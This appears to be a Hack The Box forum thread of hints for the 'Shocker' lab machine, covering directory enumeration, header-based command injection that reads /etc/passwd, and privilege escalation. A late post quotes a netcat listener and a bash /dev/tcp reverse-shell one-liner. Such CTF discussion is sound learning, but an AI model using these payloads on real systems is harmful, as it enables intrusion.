Shocker

got it ! , thanks a lot

Unable to find the entry point. Can anyone help to reach the entry point? Tried all possible dir enum tools but no luck.

Don’t focus so much on the tool as the extension you are searching for :wink:

I almost tried all the wordlists looking for the “ext” in “ext-bin” , but dirb common.txt and big.txt seems to show nothing… Any hints please?

@psyberlupus said:
I almost tried all the wordlists looking for the “ext” in “ext-bin” , but dirb common.txt and big.txt seems to show nothing… Any hints please?

So maybe the “ext” that you are thinking is the correct “ext” is, in fact, not the correct “ext”? What if it’s some other “ext” that’s frequently used in an environment such as this?

Happy Hacking. :slight_smile:

Thanks , I looked into other extensions, and got there eventually. :slight_smile:

@likwidsec said:

@psyberlupus said:
I almost tried all the wordlists looking for the “ext” in “ext-bin” , but dirb common.txt and big.txt seems to show nothing… Any hints please?

So maybe the “ext” that you are thinking is the correct “ext” is, in fact, not the correct “ext”? What if it’s some other “ext” that’s frequently used in an environment such as this?

Happy Hacking. :slight_smile:

i dont seem to understand this hint … any other

Hey Guys… Please any hint to got priv in this machine… I’m getting fucking crazy!!! 5 days in this hard mission

@raphaelmota said:
Hey Guys… Please any hint to got priv in this machine… I’m getting fucking crazy!!! 5 days in this hard mission

just use basic enumeration of linux…or run linuenum.sh script …u ll find a way of root…

This is driving me mad too. So far i’ve been searching loads of extentions and folders. I think i’m getting somewhere with a shell file i found but i do not know what to do with it. I have run a script that sees this as a possible weakness but fails when trying to shock it? Please guys, any pointers? It feels like I have tried everything!

@elvskerm said:
This is driving me mad too. So far i’ve been searching loads of extentions and folders. I think i’m getting somewhere with a shell file i found but i do not know what to do with it. I have run a script that sees this as a possible weakness but fails when trying to shock it? Please guys, any pointers? It feels like I have tried everything!

There is a tool that resembles the name of the box that proves to be very useful for this.

thanks… i will try and explain where about I am now. I believe I am looking in the right directory, probably looking at the right file as my entry point. I’ve tried shocking with a tool and it find an exploit but fails. I have also been following some info in researching, I managed to send some remote code by changing a header. I managed to pull a list of user accounts and their directory (not sure what to do with this info) - i uncovered a new user account. Am I on the right path or way off? What now - Brute force the found user account? I seem to be going around in circles! Thanks guys!

so far, having modified a header i can curl etc/passwd and also etc/group. Everytime I try to curl shadow it doesnt return anything?

you won’t need to retrieve the shadow file, access to something else will be more valuable.

i have found some valid shells. Not sure what use they are if any, and how I would use these valid shells. Also wondering if I should use one of the found passwords and try bruteforcing the password with username for ssh or ftp?

Ok, so i am pretty sure i need to meterpreter into this box. However, i am having great difficulty doing so. I’ve managed a connection that lasted seconds and then disappeared. Anyone have any decent links or info on where I can read up on how meterpreter works and how to set it up? Thank you.

No, you can own this Box (user + root) completely without meterpreter.

■■■ lol, thanks for the timesaver!!! Back to it I go!

I’m new to HTB (virgin - signed up a couple of days ago). Have some experience in this field, expertise maybe not! So decided today to give a machine a go and my first victim was Shocker. Gotta say big clue in the name! So without giving anything away there are two steps, getting a shell (name part) and gaining privilege.
What I would say for step 1 is try all the tools, not just the ones you are used to. If you know what the exploit is then you’ll know you’re looking for something. Pretty obvious you’ll be using dirb, gobuster, wfuzz, zap etc. so be smart as some scans can take a very long time, know where you are looking for that thing. if you don’t then you’re not ready for this box, go off to pentestlabs and learn stuff. For some random reason I tried using gobuster with two wordlists (that should have worked) but it found nothing. Just for laughs I tried dirbuster and ■■■, it found it in about 10 mins!
Once you have found that thing, do you thing!
Priv Esc is not difficult, if you are using a suggester tool then you should find your vector, and it’s simple from there.
Seen lots of posts, so final comment. No need to use metasploit, if you know the attack and you find the thing then that’s all you need, well with the knowledge easily obtained from pentestlabs. must also say ippsec is a legend, how the heck did they do it so quick!

So, I have a problem. Have the explotable file, have used it to obtain the user.txt, but don’t know why the reverse shell is not connecting. I’ve tried in multiple ports and nothing. I’m using a mac, know it should work.
I’m listening with nc -l 8888 and tried /bin/bash -i >& /dev/tcp/10.10… with no luck.
Any hint?

Edit: I wrote my IP wrong…Now I have the shell…